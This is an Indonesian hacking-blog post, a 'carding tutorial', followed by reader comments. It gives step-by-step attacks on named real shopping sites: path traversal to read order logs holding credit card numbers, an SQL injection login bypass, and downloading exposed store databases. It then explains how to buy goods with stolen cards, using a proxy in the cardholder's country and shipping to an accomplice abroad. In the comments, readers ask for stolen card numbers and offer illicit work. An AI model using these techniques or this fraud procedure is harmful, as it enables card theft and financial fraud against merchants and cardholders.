Home / Cracking / Carding Tutorial Archive
3000

Carding Tutorial Archive

Hallow kawan² semua, tidakkah anda tahu seberapa mudahkah anda melakukan hal ini.
Ini hanya informasi, namun kita perlu untuk mengetahuinya.
Beberapa yang biasa dilakukan didunia carding ini.

Lets Begin – Just For Share!

CGI Store Log

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm

2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=

3. Masukkan file ini di belakang situs tadi :

../admin/files/order.log

Misal nya http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

4. Maka yang keluar di situs itu adalah nomor CC (credit card).

Admin Take Over

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.partsupply.in.th/shopadmin.asp

2. Langkah selanjutnya gunakan teknik SQL Injection

user : ‘or”=’
pass : ‘or”=’

3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.

Database Downloadable

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.youngsliquors.com/winestore/shopadmin.asp

2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/

3. Masukkan file ini di belakang situs tadi :

shopdbtest.asp

Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp

4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :

xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211

5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :

http://www.youngsliquors.com/winestore/shopping300.mdb

6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.

Metacart

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.imagexpres.com/metacart/moreinfo.asp

2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/

3. Masukkan file ini di belakang situs tadi :

database/metacart.mdb

Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb

6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.

PDshopPro Shopping Cart

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.marktwainbooks.com/shop/category.asp?catid=4

2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com

3. Masukkan file ini di belakang situs tadi :

admin/dbsetup.asp

Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp

4. Maka yang keluar di situs target adalah :

Your Database Type :
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ‘setup’ Table Found!
Database permissions OK!

5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :

http://www.marktwainbooks.com/data/pdshoppro.mdb

6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.

Cara Order Barang

Sebelum melakukan order barang, kamu musti mempunyai seorang teman di luar negeri (misalnya USA) karna kita akan menggunakan alamat teman kita.
Jgn harap bisa order ke Indonesia karna Indonesia termasuk dalam daftar “Black List Order”.
Apabila kamu order barang menggunakan CC (Credit Card) org/pemiliknya asal USA maka sebelum order barang, gunakan proxy USA.
Begitu pula sebaliknya jika CC org/pemiliknya asal Inggris maka gunakan proxy UK.

1. Order sebuah Laptop di sebuah situs, misal nya seperti di bawah ini. Lalu klik tab “Add to Cart”

2. Kemudian masukkan nomor CDW (liat kolom CDW) ke kolom “QuickCart”. Lalu klik tab “Continue to Checkout”

3. Karna kamu Costumer baru, klik tab “Create Account”

4. Isilah data-data teman kamu (data di bawah ini adalah palsu).

5. Isi lagi data-data teman kamu (data di bawah ini adalah palsu).

6. Pilih salah satu “Shipping Method” nya.

7. Masukkan data CC (Credit Card) yg kamu dapati dari situs atau teman.

8. Perhatikan “Shipping Adress” nya. Laptop yg kita beli akan di kirim ke alamat teman kita (data di bawah ini adalah palsu).

9. Perhatikan lagi “Shipping Adress” nya (data di bawah ini adalah palsu).

10. Skrg kamu tinggal menunggu kabar dari teman kamu yg di luar negeri (USA) via email/telepon.

Contoh hasil hasil Tracking Order:
Thank you for your order.
(Order Number: 20081221000XX) Payment is now complete.

Order Number: 20081221000XX
Total Price: $1153.00

Products will be sent as soon as dispatch preparations are complete.

We look forward to serving you again.

====================================
Ini hanya sebuah informasi yang perlu anda ketahui!
Source from: jambihackerlink[dot]googlepages[dot]com
====================================
Jangan lupa baca juga:
http://www.binushacker.net/carding-tutorial-unrestricted-information.html

=================== EOF ===================

About nobody

Check Also

obtain-ms-w0rd-z007-binushacker

Membobol Password Ms. Office Word 2007

Greetings Binus|Hacker Familly 🙂 Berikut cara yang dapat dilakukan untuk dapat melakukan cracking terhadap password …

74 comments

  1. salam hormat,
    ERWAN, km punya banyak cc ya ? berarti kamu hacker yg cukup handal.
    bs kita komunikasi lewat email ?
    saya punya job utk kamu. mudah2 an kamu lulus dalam uji cobanya.
    ini email saya :

    langit_hitam@ymail.com

    jaya hackers indonesia
    thanks

  2. bang,bisa add YM q gak?
    YM:diego_f16@rocketmail.com

    add ya bang penting . . .

  3. bang,bisa add YM q gak?
    YM:diego_f16@rocketmail.com

    add ya bang penting . . .mau berguru . . .

  4. bang kalau bisa saya mau belajar.. email saya di yuliaastik@gmail.com.. thansk nya salam kenal

  5. saya juga mau belajar…. tolong d ajarin bang…

  6. d email ke hairibrb@gmail.com ya bang… tq…

  7. bagi satu PIN CC nya gan,berhasil ni pasti gan kirim ke email saya ya antiwhitehatproblackhat@yahoo.com kalo ada CC yg masi bisa di pake sama kode kadarluarsa nya kirim aja hasil bagi rata resiko ane tanggung yg penting CC nya

  8. boss, gimana caranya ngganti proxy ?
    gua kurang paham yang masalah proxy.
    tolong saranya/info nya ya boss ke email saya 😀
    terimah kasih

  9. Carding Tutorial Archive I was recommended this blog by my cousin. I’m not sure whether this post is written by him as nobody else know such detailed about my problem. You are incredible! Thanks! your article about Carding Tutorial ArchiveBest Regards Yoder

  10. juragan mohon kontak aq di email, kalo cocok ada kerjaan bagus banget buat juragan. thanks

  11. gan…klo bsa yach kasih yg simple, demi memajukan Rakyat nya….

  12. krim dong cc nya ke gue gan..
    makasih

  13. bro ajarin gue n krim ke email gue bsp206@yahoo.co.id

  14. gan.. share ke E-Mail ane donk…. tertarik nih… 😛 pliss gan
    nih email Ane harmulian@hotmail.com
    thanks gan, sebelum nya….
    mohon pencerahan juga di sana

  15. Sob Harus Pakai Hide IP Juga Gak Nih? Atau Gak Usah? Ini Aman?

  16. Admin@ Sudah berapa cc yg anda dapat dengan cara ini? 😀

    Newbie@ artikel di atas menurut saya masih kurang & butuh banyak penambahan, belajarlah pada orang yg berpengalaman jangan asal, butuh ketelitian,kesabaran & hati-hati jika ingin sukses, salam carder indonesia.

  17. sudah pernah nyoba belom?
    kalo sudah mending ane beli mobil ferarri sama bugati

  18. gan minta online store nya kalo boleh ???

  19. Om.ane mw nanya nih
    Lebih ampuhan yang mana yang bisa dapet CC fresh gitu
    Soalnya bisa dapet CC udah Koit

    Oh ya misalnya ane mw bli saldo gitu di game fb atw website gitu
    Harus pake proxy tempat CC berasl?

  20. payment closed kenapa itu gan…???

  21. This is really fascinating, You are a very professional blogger. Ie joined your rss feed and sit up for searching for more of your great post. Also, I have shared your site in my social networks!

  22. saya sudah belajar hacking 5thn dan sayah paham tehnik.dan saya ingin gabung dengan kalian jujur saya blackhat. masih level 1 dan mengerti tengtang hacking terimakasih.

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *